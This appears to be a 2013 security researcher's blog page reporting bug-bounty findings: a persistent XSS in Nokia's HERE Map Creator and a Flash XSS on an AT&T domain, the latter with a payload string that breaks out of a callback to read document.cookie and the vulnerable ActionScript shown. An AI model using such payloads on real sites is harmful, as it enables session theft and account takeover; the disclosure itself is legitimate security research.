Skip to main content


Showing posts from October, 2013

Dangerous Persistent XSS at [FIX], is a Nokia business unit that brings together Nokia's mapping and location assets under one brand. The technology of Here is based on a cloud-computing model, in which location data and services are stored on remote servers so that users have access to it regardless of which device they use.

 HERE Map Creator is a service launched by Nokia in November 2012 to allow users to map their neighborhood.

With this bug I could SAVE a Road name with a payload on the map. Any user that try on re-edit the street name will get this XSS.
I report a similar bug to a few months ago

Nokia Reponse:

Thanks to Nokia for starting this bug bounty program.


I found a Flash XSS at AT&T main domain where an attacker could stealing credentials of users.

Vuln URL:;}catch(e) {alert(document.cookie);}//&source=
Payload: JSAM.flashCompleteHandler);}catch(e) {alert(document.cookie);}//

Flash Vuln Code:
public function videoPlayer_completeHandler(_arg1:VideoEvent):void{ if (ExternalInterface.available){, ExternalInterface.objectID); } else { trace("JSAM_VideoPlayer cannot call completeHandler because ExternalInterface is not available."); }; }

After 2 months AT&T Response:

I hope to be on the top 10 Award :)